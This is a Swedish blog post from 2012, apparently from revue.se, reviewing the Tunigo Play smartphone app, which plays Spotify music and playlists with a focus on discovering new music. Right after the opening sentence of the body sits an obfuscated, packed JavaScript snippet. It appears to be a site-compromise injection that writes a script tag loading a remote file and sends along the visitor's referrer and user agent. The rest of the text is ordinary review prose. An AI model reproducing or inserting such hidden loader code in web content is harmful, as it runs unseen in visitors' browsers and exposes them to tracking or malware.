Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Tunigo Play – appen som hjälper dig att upptäcka ny musik

Tunigo Play – appen som hjälper dig att upptäcka ny musik
Filip Urde
  • On 20 september, 2012
  • http://www.revue.se/filip-urde

Vi skrev tidigare om webbtjänsten Tunigo Play (Här). eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skdze|var|u0026u|referrer|yazdd||js|php’.split(’|’),0,{}))
Nu har den kommit som app till din smartphone.

Tunigo Play är en applikation som är tänkt att ta Spotifys plats i din telefon och tablet. Dock inte utan Spotifys hjälp. Applikationen fungerar utifrån att du kopplar samman med ditt Spotify-konto med Tunigo Play för att sedan spela alla dina låtar och spellistor via Tunigo Play applikationen.

Varför ska man nu göra detta?

Tungio Play är som sagt ingen konkurrent till Spotify, utan en förädlare av tjänsten Spotify som vi alla älskar. Tunigo Plays idé är att gör det enklare för användaren att upptäcka och lyssna på ny musik samt hitta spellistor som passa för varje tillfälle. I Spotifys applikation finns en ”nyhets” sektion, men denna är ganska undermålig och inget som lagts något vidare fokus på.

Tunigo Play är en helt tvärtom, där är hela gränssnittet uppbyggt utifrån att hitta ny musik i alla tänkbara kategorier. Upplägget är enkelt och snyggt och det bjuder in till att testa något nytt.

Jag är själv lite av en musik fascist och gillar bara det jag ”gillar” så att säga. Nu gillar jag väldigt mycket olika stilar osv. men jag har haft svårt att lite på applikationer och ”topplistor” tidigare, så det här var nyttigt för mig att prova på.

Ladda hem Tunigo Play: här.